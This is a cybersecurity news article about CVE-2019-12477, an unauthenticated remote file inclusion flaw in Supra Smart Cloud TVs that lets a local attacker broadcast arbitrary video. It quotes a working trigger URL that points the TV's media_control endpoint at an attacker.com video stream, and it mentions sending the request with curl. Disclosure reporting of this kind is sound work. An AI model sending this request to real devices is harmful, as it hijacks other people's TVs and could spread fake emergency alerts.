CVE-2019-12477: Vulnerability in Supra Smart Cloud TV
CYBER NEWS

CVE-2019-12477: Vulnerability in Supra Smart Cloud TV

1 Star2 Stars3 Stars4 Stars5 Stars (No Ratings Yet)
Loading...

Security researcher Dhiraj Mishra just discovered a security vulnerability, CVE-2019-12477, in the SUPRA smart TV brand.

Apparently, Supra Smart Cloud TV allows remote file inclusion in the openLiveURL function, which could enable a local attacker to broadcast fake video without any authentication using /remote/media_control?action=setUri&uri=URI.




More about CVE-2019-12477

SUPRA is a Russian company that manufactures audio-video equipment, household appliances and car electronics. Most of the technology is being distributed through e-commerce websites based in Russia, China, and UAE.

In his report, the researcher shared that he successfully exploited `openLiveURL()` which allows a local attacker to broadcast video on supra smart cloud TV. “I found this vulnerability initially by source code review and then by crawling the application and reading every request helped me to trigger this vulnerability,” Mishra said.

Related:
Almost half of the Smart Homes of Today?s world have at least one weak device due to an outdated and unpatched software. Researchers and experts at Avast have established that around 40.8% of the smart homes at the moment are...Read more
40% of Smart Homes Currently Vulnerable to Hacking.

To trigger the vulnerability, an attacker would only have to send a specially crafted request to the following URL:

http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8.

Although the above mention URL takes (.m3u8) format based video. We can use `curl -v -X GET` to send such request, typically this is an unauth remote file inclusion. An attacker could broadcast any video without any authentication, the worst case attacker could leverage this vulnerability to broadcast a fake emergency message (Scary right?).

The problem here is that the vulnerability remains unpatched and it is highly likely it will stay this way. The researcher didn’t find any way to contact the vendor to report his findings. There’s also a proof-of-concept video revealing the successful exploitation. The video shows how a speech of Steve Jobs is suddenly replaced with an attacker’s fake “Emergency Alert Message”.

The vulnerability has been assigned a CVE ID, CVE-2019-12477 but there is no information if it will ever be addresses. So, what can owners of SUPRA Smart Cloud TVs do? The short answer is keeping the wireless network as secure as possible by using a strong password and a firewall for all smart devices. Because, as we’re proven every day, smart homes are not that smart at all.

Related:
While the MQTT protocol itself is secure, if implemented and configured incorrectly, severe security issues may show up. Learn more...
Misconfigured MQTT Protocol Puts Thousands of Smart Homes at Risk.

A great example of how easy it is to hack a smart home comes from Avast researchers. Last August, they warned about the MQTT protocol (Message Queuing Telemetry Transport) which, if misconfigured, could give hackers complete access to a smart home. As a result of this security loophole, the home could be manipulated in many ways including its entertaining and voice systems, various household devices, and smart doors.

Avatar

Milena Dimitrova

An inspired writer and content manager who has been with SensorsTechForum for 4 years. Enjoys ‘Mr. Robot’ and fears ‘1984’. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles!

More Posts

Leave a Comment

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.

Share on Facebook Share
Loading...
Share on Twitter Tweet
Loading...
Share on Google Plus Share
Loading...
Share on Linkedin Share
Loading...
Share on Digg Share
Share on Reddit Share
Loading...
Share on Stumbleupon Share
Loading...